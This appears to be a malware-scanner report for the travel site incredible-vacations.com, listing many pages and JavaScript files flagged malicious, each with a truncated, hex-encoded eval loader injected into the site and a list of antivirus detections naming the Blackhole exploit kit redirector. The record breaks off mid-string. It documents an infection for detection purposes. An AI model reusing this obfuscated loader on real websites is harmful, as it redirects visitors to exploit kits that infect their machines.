Request | Server response | Status |
http://incredible-vacations.com/ | 200 OK Content-Length: 37454 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/index.php | 200 OK Content-Length: 41053 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/index.php | 200 OK Content-Length: 36637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["bo"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_
... 3492 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/jquery.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
